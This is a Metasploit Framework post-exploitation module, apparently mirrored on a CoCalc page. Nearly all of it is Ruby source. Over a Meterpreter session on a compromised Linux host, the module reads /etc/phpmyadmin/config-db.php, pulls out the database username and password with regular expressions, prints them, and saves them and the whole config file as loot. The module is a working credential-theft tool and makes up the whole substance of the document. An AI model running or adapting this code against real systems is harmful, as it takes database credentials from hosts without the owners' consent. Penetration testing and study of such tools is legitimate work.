CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/linux/gather/phpmyadmin_credsteal.rb
Views: 11704
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  include Msf::Post::File

9
  include Msf::Post::Linux::Priv

10
  include Msf::Post::Linux::System

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Phpmyadmin credentials stealer',

17
        'Description' => %q{

18
          This module gathers Phpmyadmin creds from target linux machine.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Platform' => ['linux'],

22
        'SessionTypes' => ['meterpreter'],

23
        'Author' => [

24
          'Chaitanya Haritash [bofheaded]',

25
          'Dhiraj Mishra <[email protected]>'

26
        ]

27
      )

28
    )

29
  end

30


31
  def parse_creds(contents)

32
    db_user = contents.scan(/\$dbuser\s*=\s*['"](.*)['"];/).flatten.first

33
    db_pass = contents.scan(/\$dbpass\s*=\s*['"](.*)['"];/).flatten.first

34


35
    unless db_user && db_pass

36
      print_error("Couldn't find PhpMyAdmin credentials")

37
      return

38
    end

39


40
    print_good("User: #{db_user}")

41
    print_good("Password: #{db_pass}")

42


43
    print_status('Storing credentials...')

44
    store_valid_credential(user: db_user, private: db_pass)

45
  end

46


47
  def run

48
    print_line("\nPhpMyAdmin Creds Stealer!\n")

49


50
    if session.platform.include?('windows')

51
      print_error('This module is not compatible with windows')

52
      return

53
    end

54


55
    conf_path = '/etc/phpmyadmin/config-db.php'

56
    unless file_exist?(conf_path)

57
      print_error("#{conf_path} doesn't exist on target")

58
      return

59
    end

60


61
    print_good('PhpMyAdmin config found!')

62
    res = read_file(conf_path)

63
    unless res

64
      print_error('You may not have permissions to read the file.')

65
      return

66
    end

67


68
    print_good('Extracting creds')

69
    parse_creds(res)

70


71
    p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')

72
    print_good("Config file located at #{p}")

73
  end

74
end

75


76